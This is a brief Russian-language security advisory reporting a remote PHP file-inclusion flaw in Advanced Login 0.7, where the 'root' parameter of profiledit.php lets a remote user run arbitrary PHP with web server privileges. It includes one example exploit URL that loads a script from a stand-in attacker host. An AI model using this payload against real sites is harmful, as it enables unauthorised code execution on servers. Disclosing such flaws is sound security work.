Программа: Advanced Login 0.7

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «root» сценарием profiledit.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://target.com/login/engine/db/profiledit.php?root==http://attact.com/colok.txt?



Оставить мнение